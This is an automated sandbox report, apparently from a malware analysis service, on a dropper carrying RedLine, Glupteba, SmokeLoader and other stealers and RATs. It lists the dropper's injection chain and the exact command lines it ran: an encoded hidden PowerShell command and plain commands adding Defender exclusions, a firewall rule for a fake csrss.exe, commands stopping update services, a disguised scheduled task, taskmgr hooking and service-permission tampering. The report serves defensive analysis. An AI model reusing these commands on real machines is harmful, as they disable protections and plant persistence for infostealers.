Malware Analysis Report

2024-12-08 01:19

Sample ID 231111-mh6dxade6w
Target NEAS.5d5380e1ec3580484f3bd5559f3104531e7cc9462b4d4c3ea02a862ca5b7c70f.exe
SHA256 5d5380e1ec3580484f3bd5559f3104531e7cc9462b4d4c3ea02a862ca5b7c70f
Tags
glupteba mystic redline sectoprat smokeloader zgrat pixelnew2.0 taiga up3 backdoor dropper evasion infostealer loader persistence rat stealer trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

5d5380e1ec3580484f3bd5559f3104531e7cc9462b4d4c3ea02a862ca5b7c70f

Threat Level: Known bad

The file NEAS.5d5380e1ec3580484f3bd5559f3104531e7cc9462b4d4c3ea02a862ca5b7c70f.exe was found to be: Known bad.

Malicious Activity Summary

glupteba mystic redline sectoprat smokeloader zgrat pixelnew2.0 taiga up3 backdoor dropper evasion infostealer loader persistence rat stealer trojan upx

SectopRAT

Glupteba payload

RedLine

Detect Mystic stealer payload

ZGRat

RedLine payload

SmokeLoader

Mystic

Glupteba

Detect ZGRat V1

SectopRAT payload

Downloads MZ/PE file

Modifies Windows Firewall

Stops running service(s)

Executes dropped EXE

Checks computer location settings

UPX packed file

Adds Run key to start application

Suspicious use of SetThreadContext

Launches sc.exe

Unsigned PE

Program crash

Enumerates physical storage devices

Creates scheduled task(s)

Suspicious behavior: MapViewOfSection

Suspicious behavior: EnumeratesProcesses

Checks SCSI registry key(s)

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-11-11 10:28

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-11-11 10:28

Reported

2023-11-11 10:31

Platform

win10v2004-20231020-en

Max time kernel

46s

Max time network

136s

Command Line

"C:\Users\Admin\AppData\Local\Temp\NEAS.5d5380e1ec3580484f3bd5559f3104531e7cc9462b4d4c3ea02a862ca5b7c70f.exe"

Signatures

Detect Mystic stealer payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Mystic

stealer mystic

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

ZGRat

rat zgrat

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7iA7Fq05.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\NEAS.5d5380e1ec3580484f3bd5559f3104531e7cc9462b4d4c3ea02a862ca5b7c70f.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Pd6hs45.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\tB0jz14.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2pe5289.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2pe5289.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2pe5289.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2pe5289.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2pe5289.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2pe5289.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2796 wrote to memory of 2168 N/A C:\Users\Admin\AppData\Local\Temp\NEAS.5d5380e1ec3580484f3bd5559f3104531e7cc9462b4d4c3ea02a862ca5b7c70f.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Pd6hs45.exe
PID 2796 wrote to memory of 2168 N/A C:\Users\Admin\AppData\Local\Temp\NEAS.5d5380e1ec3580484f3bd5559f3104531e7cc9462b4d4c3ea02a862ca5b7c70f.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Pd6hs45.exe
PID 2796 wrote to memory of 2168 N/A C:\Users\Admin\AppData\Local\Temp\NEAS.5d5380e1ec3580484f3bd5559f3104531e7cc9462b4d4c3ea02a862ca5b7c70f.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Pd6hs45.exe
PID 2168 wrote to memory of 3488 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Pd6hs45.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\tB0jz14.exe
PID 2168 wrote to memory of 3488 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Pd6hs45.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\tB0jz14.exe
PID 2168 wrote to memory of 3488 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Pd6hs45.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\tB0jz14.exe
PID 3488 wrote to memory of 1200 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\tB0jz14.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1QI06ok4.exe
PID 3488 wrote to memory of 1200 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\tB0jz14.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1QI06ok4.exe
PID 3488 wrote to memory of 1200 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\tB0jz14.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1QI06ok4.exe
PID 1200 wrote to memory of 3436 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1QI06ok4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1200 wrote to memory of 3436 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1QI06ok4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1200 wrote to memory of 3436 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1QI06ok4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1200 wrote to memory of 3436 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1QI06ok4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1200 wrote to memory of 3436 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1QI06ok4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1200 wrote to memory of 3436 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1QI06ok4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1200 wrote to memory of 3436 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1QI06ok4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1200 wrote to memory of 3436 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1QI06ok4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1200 wrote to memory of 3436 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1QI06ok4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1200 wrote to memory of 3436 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1QI06ok4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3488 wrote to memory of 4800 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\tB0jz14.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2pe5289.exe
PID 3488 wrote to memory of 4800 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\tB0jz14.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2pe5289.exe
PID 3488 wrote to memory of 4800 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\tB0jz14.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2pe5289.exe
PID 2168 wrote to memory of 444 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Pd6hs45.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6Qo3Av6.exe
PID 2168 wrote to memory of 444 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Pd6hs45.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6Qo3Av6.exe
PID 2168 wrote to memory of 444 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Pd6hs45.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6Qo3Av6.exe
PID 444 wrote to memory of 1044 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6Qo3Av6.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 444 wrote to memory of 1044 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6Qo3Av6.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 444 wrote to memory of 1044 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6Qo3Av6.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 444 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6Qo3Av6.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 444 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6Qo3Av6.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 444 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6Qo3Av6.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 444 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6Qo3Av6.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 444 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6Qo3Av6.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 444 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6Qo3Av6.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 444 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6Qo3Av6.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 444 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6Qo3Av6.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2796 wrote to memory of 3004 N/A C:\Users\Admin\AppData\Local\Temp\NEAS.5d5380e1ec3580484f3bd5559f3104531e7cc9462b4d4c3ea02a862ca5b7c70f.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7iA7Fq05.exe
PID 2796 wrote to memory of 3004 N/A C:\Users\Admin\AppData\Local\Temp\NEAS.5d5380e1ec3580484f3bd5559f3104531e7cc9462b4d4c3ea02a862ca5b7c70f.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7iA7Fq05.exe
PID 2796 wrote to memory of 3004 N/A C:\Users\Admin\AppData\Local\Temp\NEAS.5d5380e1ec3580484f3bd5559f3104531e7cc9462b4d4c3ea02a862ca5b7c70f.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7iA7Fq05.exe
PID 3004 wrote to memory of 3920 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7iA7Fq05.exe C:\Windows\SysWOW64\cmd.exe
PID 3004 wrote to memory of 3920 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7iA7Fq05.exe C:\Windows\SysWOW64\cmd.exe
PID 3004 wrote to memory of 3920 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7iA7Fq05.exe C:\Windows\SysWOW64\cmd.exe
PID 3184 wrote to memory of 4780 N/A N/A C:\Users\Admin\AppData\Local\Temp\4C94.exe
PID 3184 wrote to memory of 4780 N/A N/A C:\Users\Admin\AppData\Local\Temp\4C94.exe
PID 3184 wrote to memory of 4780 N/A N/A C:\Users\Admin\AppData\Local\Temp\4C94.exe
PID 3184 wrote to memory of 3512 N/A N/A C:\Users\Admin\AppData\Local\Temp\4DFD.exe
PID 3184 wrote to memory of 3512 N/A N/A C:\Users\Admin\AppData\Local\Temp\4DFD.exe
PID 3184 wrote to memory of 3512 N/A N/A C:\Users\Admin\AppData\Local\Temp\4DFD.exe

Processes

C:\Users\Admin\AppData\Local\Temp\NEAS.5d5380e1ec3580484f3bd5559f3104531e7cc9462b4d4c3ea02a862ca5b7c70f.exe

"C:\Users\Admin\AppData\Local\Temp\NEAS.5d5380e1ec3580484f3bd5559f3104531e7cc9462b4d4c3ea02a862ca5b7c70f.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Pd6hs45.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Pd6hs45.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\tB0jz14.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\tB0jz14.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1QI06ok4.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1QI06ok4.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2pe5289.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2pe5289.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 3436 -ip 3436

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3436 -s 192

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6Qo3Av6.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6Qo3Av6.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7iA7Fq05.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7iA7Fq05.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\is64.bat" "

C:\Users\Admin\AppData\Local\Temp\4C94.exe

C:\Users\Admin\AppData\Local\Temp\4C94.exe

C:\Users\Admin\AppData\Local\Temp\4DFD.exe

C:\Users\Admin\AppData\Local\Temp\4DFD.exe

C:\Users\Admin\AppData\Local\Temp\6697.exe

C:\Users\Admin\AppData\Local\Temp\6697.exe

C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe

"C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\6ABE.exe

C:\Users\Admin\AppData\Local\Temp\6ABE.exe

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\Broom.exe

C:\Users\Admin\AppData\Local\Temp\Broom.exe

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Users\Admin\AppData\Local\Temp\6FEF.exe

C:\Users\Admin\AppData\Local\Temp\6FEF.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\6ABE.exe

C:\Users\Admin\AppData\Local\Temp\6ABE.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcACoALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACAALQBGAG8AcgBjAGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlAA==

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Roaming\Tags\Settings.exe

C:\Users\Admin\AppData\Roaming\Tags\Settings.exe

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Users\Admin\AppData\Local\Temp\29EA.exe

C:\Users\Admin\AppData\Local\Temp\29EA.exe

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe"

C:\Users\Admin\AppData\Local\Temp\6D0E.exe

C:\Users\Admin\AppData\Local\Temp\6D0E.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Users\Admin\AppData\Local\Temp\8DE5.exe

C:\Users\Admin\AppData\Local\Temp\8DE5.exe

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\tor.exe

"C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\tor.exe" --nt-service -f "C:\Users\Admin\AppData\Local\Temp\csrss\tor\torrc" --Log "notice file C:\Users\Admin\AppData\Local\Temp\csrss\tor\log.txt"

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

C:\Windows\SysWOW64\cmd.exe

